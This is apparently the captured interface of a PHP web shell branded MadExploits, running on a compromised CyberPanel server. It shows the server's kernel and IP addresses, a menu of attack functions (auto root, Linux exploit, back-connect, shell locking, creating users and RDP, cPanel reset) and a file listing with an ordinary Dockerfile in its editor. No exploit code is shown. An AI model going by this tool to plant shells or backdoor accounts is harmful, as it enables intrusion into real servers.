Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
dockerManager /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
migrations
[ DIR ]
drwxr-xr-x
static
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
DOCKER_MANAGER_FIXES.md
3.18
KB
-rw-r--r--
Dockerfile
1002
B
-rw-r--r--
__init__.py
0
B
-rw-r--r--
admin.py
89
B
-rw-r--r--
apps.py
127
B
-rw-r--r--
build.sh
106
B
-rw-r--r--
container.py
69.34
KB
-rw-r--r--
decorators.py
2.27
KB
-rw-r--r--
docker-compose.yml
713
B
-rw-r--r--
dockerInstall.py
5.2
KB
-rw-r--r--
entrypoint.sh
1.34
KB
-rw-r--r--
models.py
689
B
-rw-r--r--
pluginManager.py
401
B
-rw-r--r--
signals.py
346
B
-rw-r--r--
tests.py
86
B
-rw-r--r--
urls.py
3.17
KB
-rw-r--r--
vhconf.conf
1.58
KB
-rw-r--r--
views.py
17.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dockerfile
# Use Debian as the base image FROM debian:11.0 # Install required dependencies RUN apt-get update && \ apt-get install -y wget gnupg ca-certificates # Install OpenLiteSpeed RUN wget -O - http://rpms.litespeedtech.com/debian/enable_lst_debian_repo.sh | bash RUN apt-get install -y openlitespeed # Install PHP and required PHP extensions for WordPress RUN apt-get install -y lsphp82* ### RUN rm -rf /usr/local/lsws/Example/html/* # Install WP CLI RUN wget https://github.com/wp-cli/wp-cli/releases/download/v2.7.1/wp-cli-2.7.1.phar RUN chmod +x wp-cli-2.7.1.phar RUN mv wp-cli-2.7.1.phar /usr/bin/wp ## set up vh conf RUN rm -f /usr/local/lsws/conf/vhosts/Example/vhconf.conf COPY ./vhconf.conf /usr/local/lsws/conf/vhosts/Example/vhconf.conf # Expose necessary ports EXPOSE 8088 # Copy entrypoint script COPY entrypoint.sh /usr/local/bin/entrypoint.sh # Set execute permissions RUN chmod +x /usr/local/bin/entrypoint.sh # Define entrypoint ENTRYPOINT ["/usr/local/bin/entrypoint.sh"]
Close